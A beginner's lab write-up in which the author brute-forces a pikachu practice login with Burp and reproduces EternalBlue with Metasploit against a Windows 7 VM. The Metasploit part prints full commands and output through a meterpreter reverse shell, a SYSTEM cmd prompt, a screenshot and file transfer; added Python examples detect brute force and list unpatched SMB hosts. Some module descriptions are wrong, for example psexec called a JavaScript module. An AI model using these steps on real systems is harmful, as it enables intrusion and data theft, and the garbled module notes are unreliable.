Network Security (Beginner) (1)
I. Setting up nginx with Docker
# Install Docker and Docker Compose
root@yy-VMware-Virtual-Platform:~# apt-get install docker.io docker-compose
# Verify that Docker installed successfully by printing its version
root@yy-VMware-Virtual-Platform:~# docker -v
Docker version 27.5.1, build 27.5.1-0ubuntu3~24.04.2
# Create the Docker service drop-in directory (for custom configuration)
root@yy-VMware-Virtual-Platform:~# mkdir /etc/systemd/system/docker.service.d
# Configure a proxy so that Docker can reach the internet through a proxy server
root@yy-VMware-Virtual-Platform:~# vim /etc/systemd/system/docker.service.d/http-proxy.conf
[Service]
# Proxy address for HTTP requests
Environment="HTTP_PROXY=http://192.168.1.6:7897"
# Proxy address for HTTPS requests
Environment="HTTPS_PROXY=http://192.168.1.6:7897"
# Addresses that bypass the proxy
Environment="NO_PROXY=localhost,127.0.0.1"
# Check that the proxy server is reachable (ping test)
root@yy-VMware-Virtual-Platform:~# ping 192.168.1.6
PING 192.168.1.6 (192.168.1.6) 56(84) bytes of data.
64 bytes from 192.168.1.6: icmp_seq=1 ttl=128 time=0.570 ms
# ... (remaining ping output omitted)
# Pull the official Nginx image from Docker Hub (the latest tag is used by default)
root@yy-VMware-Virtual-Platform:~# docker pull nginx
Using default tag: latest
latest: Pulling from library/nginx
# ... (pull progress output omitted)
Status: Downloaded newer image for nginx:latest
docker.io/library/nginx:latest
# List the Docker images that have been downloaded locally
root@yy-VMware-Virtual-Platform:~# docker images
REPOSITORY   TAG       IMAGE ID       CREATED       SIZE
nginx        latest    9592f5595f2b   2 weeks ago   192MB
# Run the Nginx container detached (-d), mapping host port 80 to container port 80
# (-p 80:80 publishes on all host interfaces, as the PORTS column of docker ps shows)
# Note: the earlier error was caused by port 80 being in use; success this time means the port conflict is resolved
root@yy-VMware-Virtual-Platform:~# docker run -d -p 80:80 9592f5595f2b
c62cb7101ebb28202fd6255423dd95ffcc96094e78da6a6ae28f1c2b5599565f
# List the running containers to confirm that the Nginx container is up
root@yy-VMware-Virtual-Platform:~# docker ps
CONTAINER ID   IMAGE          COMMAND                  CREATED         STATUS         PORTS                               NAMES
c62cb7101ebb   9592f5595f2b   "/docker-entrypoint.…"   4 seconds ago   Up 3 seconds   0.0.0.0:80->80/tcp, :::80->80/tcp   elated_ardinghelli
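Verification:
II. Setting up the pikachu lab with the XiaoPi panel (小皮面板)
1. Install the XiaoPi panel
root@yy-VMware-Virtual-Platform:~# sudo wget -O install.sh https://dl.xp.cn/dl/xp/install.sh && sudo bash install.sh
2. Configure pikachu through the XiaoPi panel
Start the services
Look up the database password
Add the pikachu lab files
Create the lab website
Open the pikachu lab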
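III. Cracking the pikachu login password with Burp's Intruder (brute-force) module
1. Open the embedded browser
2. Go to the pikachu vulnerability practice platform and choose the form-based brute-force exercise
3. Turn on interception
4. Capture the intercepted request
5. Send the intercepted request to Intruder
6. Mark the field to be cracked
7. Load the password list and start the attack
8. Find the entry whose response length differs from the rest
9. The password for that entry is the correct one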
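Seen from the server side, the Intruder run in steps 5-9 is a burst of POSTs to the login form from one address, and the response whose size differs marks the guess to treat as successful during incident response. The Python below is an added example, not part of the original write-up. The combined access-log format, the /login.php path, the thresholds and the sample lines are all constructed assumptions.

```python
import re
from collections import Counter, defaultdict, deque
from datetime import datetime, timedelta

# Combined-log-format line: ip, timestamp, method, path, status, response size.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+)'
)

def login_posts(lines, login_path):
    """Yield (ip, timestamp, response size) for each POST to login_path."""
    for line in lines:
        m = LINE_RE.match(line)
        if m and m["method"] == "POST" and m["path"].split("?")[0] == login_path:
            ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
            yield m["ip"], ts, int(m["size"])

def detect_bruteforce(lines, login_path, max_posts=5, window=timedelta(seconds=10)):
    """Return {ip: peak POST count} for IPs with more than max_posts in any window."""
    recent, peaks = defaultdict(deque), {}
    for ip, ts, _ in login_posts(lines, login_path):
        q = recent[ip]
        q.append(ts)
        while ts - q[0] > window:      # drop attempts that fell out of the window
            q.popleft()
        if len(q) > max_posts:
            peaks[ip] = max(peaks.get(ip, 0), len(q))
    return peaks

def odd_responses(lines, login_path, ip):
    """Times of this IP's login responses whose size differs from its most common one."""
    posts = [(ts, size) for i, ts, size in login_posts(lines, login_path) if i == ip]
    usual = Counter(size for _, size in posts).most_common(1)
    return [ts.strftime("%H:%M:%S") for ts, size in posts if size != usual[0][0]]

# Constructed sample: one normal user, then 8 POSTs in 14 s from 10.0.0.50.
SAMPLE = [
    '10.0.0.20 - - [10/Jul/2025:18:30:00 +0800] "GET /login.php HTTP/1.1" 200 35010',
    '10.0.0.20 - - [10/Jul/2025:18:30:05 +0800] "POST /login.php HTTP/1.1" 200 35048',
] + [
    f'10.0.0.50 - - [10/Jul/2025:18:31:{s:02d} +0800] "POST /login.php HTTP/1.1" 200 '
    f'{35048 if s == 12 else 35072}'
    for s in range(0, 16, 2)
]

if __name__ == "__main__":
    for ip, peak in detect_bruteforce(SAMPLE, "/login.php").items():
        print(ip, peak, odd_responses(SAMPLE, "/login.php", ip))
```

The account behind a flagged odd-sized response is the one to lock and reset first.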
IV. Reproducing EternalBlue with MSF
Installing MSF on Kali
┌──(yy㉿kail)-[~]
└─$ sudo apt install metasploit-framework
[sudo] yy 的密码:
正在读取软件包列表... 完成
正在分析软件包的依赖关系树... 完成
正在读取状态信息... 完成
metasploit-framework 已经是最新版 (6.3.16-0kali1)。
metasploit-framework 已设置为手动安装。
升级了 0 个软件包,新安装了 0 个软件包,要卸载 0 个软件包,有 0 个软件包未被升级。
┌──(yy㉿kail)-[~]
└─$ sudo msfdb init
[+] Starting database
[+] Creating database user 'msf'
为新角色输入的口令:
再输入一遍:
[+] Creating databases 'msf'
[+] Creating databases 'msf_test'
[+] Creating configuration file '/usr/share/metasploit-framework/config/database.yml'
[+] Creating initial database schema
┌──(yy㉿kail)-[~]
└─$ msfconsole
# ... (ASCII-art banner omitted)
       =[ metasploit v6.3.16-dev ]
+ -- --=[ 2315 exploits - 1208 auxiliary - 412 post ]
+ -- --=[ 975 payloads - 46 encoders - 11 nops ]
+ -- --=[ 9 evasion ]

Metasploit tip: Tired of setting RHOSTS for modules? Try
globally setting it with setg RHOSTS x.x.x.x
Metasploit Documentation: https://docs.metasploit.com/

msf6 >
1. Turn off the Win7 firewall
2. Check the IP addresses on Win7 and on Kali
Kali
┌──(yy㉿kail)-[~]
└─$ ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.211.136  netmask 255.255.255.0  broadcast 192.168.211.255
        inet6 fe80::20c:29ff:fe44:2c10  prefixlen 64  scopeid 0x20<link>
        ether 00:0c:29:44:2c:10  txqueuelen 1000  (Ethernet)
        RX packets 3226  bytes 291263 (284.4 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 2826  bytes 288328 (281.5 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 12749  bytes 2208926 (2.1 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 12749  bytes 2208926 (2.1 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
Win7
3. Host discovery: scan the subnet with nmap on Kali
┌──(yy㉿kail)-[~]
└─$ nmap -sP 192.168.211.0/24 # -sP: ping scan (current nmap releases call this option -sn)
Starting Nmap 7.93 ( https://nmap.org ) at 2025-07-10 18:44 CST
Nmap scan report for 192.168.211.1 (192.168.211.1)
Host is up (0.00086s latency).
Nmap scan report for 192.168.211.2 (192.168.211.2)
Host is up (0.00078s latency).
Nmap scan report for 192.168.211.135 (192.168.211.135)
Host is up (0.00055s latency).
Nmap scan report for 192.168.211.136 (192.168.211.136)
Host is up (0.000042s latency).
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.32 seconds
4. Host discovery with Metasploit (MSF) on Kali
┌──(yy㉿kail)-[~]
└─$ sudo msfconsole
# ... (ASCII-art banner omitted)
       =[ metasploit v6.3.16-dev ]
+ -- --=[ 2315 exploits - 1208 auxiliary - 412 post ]
+ -- --=[ 975 payloads - 46 encoders - 11 nops ]
+ -- --=[ 9 evasion ]

Metasploit tip: Use sessions -1 to interact with the
last opened session
Metasploit Documentation: https://docs.metasploit.com/

msf6 > use auxiliary/scanner/discovery/arp_sweep
msf6 auxiliary(scanner/discovery/arp_sweep) > set rhosts 192.168.211.0/24
rhosts => 192.168.211.0/24
msf6 auxiliary(scanner/discovery/arp_sweep) > set threads 50
threads => 50
msf6 auxiliary(scanner/discovery/arp_sweep) > run

[+] 192.168.211.1 appears to be up (VMware, Inc.).
[+] 192.168.211.2 appears to be up (VMware, Inc.).
[+] 192.168.211.135 appears to be up (VMware, Inc.).
[+] 192.168.211.2 appears to be up (VMware, Inc.).
[+] 192.168.211.135 appears to be up (VMware, Inc.).
[+] 192.168.211.254 appears to be up (VMware, Inc.).
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
5. Port scanning
(1) Port scan with nmap -sT
┌──(root㉿kail)-[/home/yy]
└─# nmap -sT 192.168.211.135
Starting Nmap 7.93 ( https://nmap.org ) at 2025-07-10 18:54 CST
Nmap scan report for 192.168.211.135 (192.168.211.135)
Host is up (0.00017s latency).
Not shown: 992 closed tcp ports (conn-refused)
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49156/tcp open  unknown
MAC Address: 00:0C:29:49:B6:45 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 2.37 seconds
(2) Port scan with MSF
msf6 auxiliary(scanner/portscan/tcp) > use auxiliary/scanner/portscan/tcp
msf6 auxiliary(scanner/portscan/tcp) > set rhosts 192.168.211.135
rhosts => 192.168.211.135
msf6 auxiliary(scanner/portscan/tcp) > run

[+] 192.168.211.135: - 192.168.211.135:135 - TCP OPEN
[+] 192.168.211.135: - 192.168.211.135:139 - TCP OPEN
[+] 192.168.211.135: - 192.168.211.135:445 - TCP OPEN
[*] 192.168.211.135: - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
6. Using the modules
(1) Search MSF for the EternalBlue vulnerability: enter search ms17-010
msf6 > search ms17-010

Matching Modules
================

   #  Name                                      Disclosure Date  Rank     Check  Description
   -  ----                                      ---------------  ----     -----  -----------
   0  exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   1  exploit/windows/smb/ms17_010_psexec       2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   2  auxiliary/admin/smb/ms17_010_command      2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   3  auxiliary/scanner/smb/smb_ms17_010                         normal   No     MS17-010 SMB RCE Detection
   4  exploit/windows/smb/smb_doublepulsar_rce  2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution

Interact with a module by name or index. For example info 4, use 4 or use exploit/windows/smb/smb_doublepulsar_rce
1. eternalblue is the EternalBlue vulnerability itself
2. psexec is a usable JavaScript (JS) module
3. command is for running cmd
4. The last one is the detection module
(2) Use the detection module to check whether this Win7 host may be vulnerable
msf6 > use auxiliary/scanner/smb/smb_ms17_010
msf6 auxiliary(scanner/smb/smb_ms17_010) > show options

Module options (auxiliary/scanner/smb/smb_ms17_010):

   Name         Current Setting                                                 Required  Description
   ----         ---------------                                                 --------  -----------
   CHECK_ARCH   true                                                            no        Check for architecture on vulnerable hosts
   CHECK_DOPU   true                                                            no        Check for DOUBLEPULSAR on vulnerable hosts
   CHECK_PIPE   false                                                           no        Check for named pipe on vulnerable hosts
   NAMED_PIPES  /usr/share/metasploit-framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
   RHOSTS                                                                       yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT        445                                                             yes       The SMB service port (TCP)
   SMBDomain    .                                                               no        The Windows domain to use for authentication
   SMBPass                                                                      no        The password for the specified username
   SMBUser                                                                      no        The username to authenticate as
   THREADS      1                                                               yes       The number of concurrent threads (max one per host)

View the full module info with the info, or info -d command.

msf6 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.211.135
rhosts => 192.168.211.135
msf6 auxiliary(scanner/smb/smb_ms17_010) > run

[+] 192.168.211.135:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Home Basic 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.211.135:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
The scan reports "likely": the host probably has the vulnerability.
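For a defender, the nmap port scan from step 5 and the smb_ms17_010 scanner result above combine into a patching worklist. The Python below is an added example, not part of the original write-up: the 192.168.211.135 lines are copied from the output above, hosts .140 and .141 are constructed, and the function names are hypothetical.

```python
import re

SMB_PORTS = {139, 445}
IP = r"\d{1,3}(?:\.\d{1,3}){3}"
HOST_RE = re.compile(rf"^Nmap scan report for (?:\S+ \()?({IP})\)?")
PORT_RE = re.compile(r"^(\d+)/tcp\s+open\s")
VULN_RE = re.compile(rf"^\[\+\] ({IP}):445\s+- Host is likely VULNERABLE to MS17-010! - (.+)$")

def open_ports(nmap_text):
    """Map each host in nmap's normal output to its open TCP ports."""
    hosts, current = {}, None
    for line in nmap_text.splitlines():
        if m := HOST_RE.match(line):
            current = m.group(1)
            hosts[current] = []
        elif current and (m := PORT_RE.match(line)):
            hosts[current].append(int(m.group(1)))
    return hosts

def worklist(nmap_text, scanner_text):
    """Return (ip, exposed SMB ports, OS or None) rows, likely-vulnerable hosts first."""
    likely = {m.group(1): m.group(2)
              for line in scanner_text.splitlines() if (m := VULN_RE.match(line))}
    rows = [(ip, sorted(SMB_PORTS & set(ports)), likely.get(ip))
            for ip, ports in open_ports(nmap_text).items() if SMB_PORTS & set(ports)]
    return sorted(rows, key=lambda r: (r[2] is None, r[0]))

# 192.168.211.135 is taken from the output above; .140 and .141 are constructed.
NMAP_OUT = """\
Nmap scan report for 192.168.211.135 (192.168.211.135)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Nmap scan report for 192.168.211.140
80/tcp open http
Nmap scan report for 192.168.211.141
445/tcp open microsoft-ds
"""
SCAN_OUT = ("[+] 192.168.211.135:445 - Host is likely VULNERABLE to MS17-010! - "
            "Windows 7 Home Basic 7601 Service Pack 1 x64 (64-bit)")

if __name__ == "__main__":
    for ip, ports, os_name in worklist(NMAP_OUT, SCAN_OUT):
        print(ip, ports, os_name or "not reported by scanner")
```

Rows with an OS string were reported likely vulnerable and need the MS17-010 security update first; the remaining rows expose SMB and are the next to check.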
(3) Use the EternalBlue module
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS         192.168.184.135  yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT          445              yes       The target port (TCP)
   SMBDomain                       no        (Optional) The Windows domain to use for authentication. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.

Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.211.136  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic Target

View the full module info with the info, or info -d command.

msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 192.168.211.135
rhosts => 192.168.211.135
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit

[*] Started reverse TCP handler on 192.168.211.136:4444
[*] 192.168.211.135:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.211.135:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Home Basic 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.211.135:445 - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.211.135:445 - The target is vulnerable.
[*] 192.168.211.135:445 - Connecting to target for exploitation.
[+] 192.168.211.135:445 - Connection established for exploitation.
[+] 192.168.211.135:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.211.135:445 - CORE raw buffer dump (40 bytes)
[*] 192.168.211.135:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 48 6f 6d 65 20 42 Windows 7 Home B
[*] 192.168.211.135:445 - 0x00000010 61 73 69 63 20 37 36 30 31 20 53 65 72 76 69 63 asic 7601 Servic
[*] 192.168.211.135:445 - 0x00000020 65 20 50 61 63 6b 20 31 e Pack 1
[+] 192.168.211.135:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.211.135:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.211.135:445 - Sending all but last fragment of exploit packet
[*] 192.168.211.135:445 - Starting non-paged pool grooming
[+] 192.168.211.135:445 - Sending SMBv2 buffers
[+] 192.168.211.135:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.211.135:445 - Sending final SMBv2 buffers.
[*] 192.168.211.135:445 - Sending last fragment of exploit packet!
[*] 192.168.211.135:445 - Receiving response from exploit packet
[+] 192.168.211.135:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.211.135:445 - Sending egg to corrupted connection.
[*] 192.168.211.135:445 - Triggering free of corrupted buffer.
[*] Sending stage (200774 bytes) to 192.168.211.135
[+] 192.168.211.135:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.211.135:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.211.135:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] Meterpreter session 1 opened (192.168.211.136:4444 -> 192.168.211.135:49211) at 2025-07-10 19:11:15 +0800
Success.
7. Demonstrating functionality
(1) Get a cmd shell
meterpreter > shell
Process 2744 created.
Channel 1 created.
Microsoft Windows [�汾 6.1.7601]
��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ����

C:\Windows\system32>chcp 65001
chcp 65001
Active code page: 65001

C:\Windows\system32>ipconfig
ipconfig

Windows IP Configuration

Ethernet adapter ��������:

   Connection-specific DNS Suffix  . : localdomain
   Link-local IPv6 Address . . . . . : fe80::adbe:371a:f662:9f87%11
   IPv4 Address. . . . . . . . . . . : 192.168.211.135
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.211.2

Tunnel adapter isatap.localdomain:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : localdomain

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>
(2) Capture the screen
meterpreter > screenshot
Screenshot saved to: /home/yy/cgtmahki.jpeg
(3) Upload a file
meterpreter > upload /home/yy/msfinstall C://
[*] Uploading : /home/yy/msfinstall -> C://\msfinstall
[*] Completed : /home/yy/msfinstall -> C://\msfinstall
(4) Download a file
meterpreter > download c://1.txt
[*] Downloading: c://1.txt -> /home/yy/1.txt
[*] Completed : c://1.txt -> /home/yy/1.txt
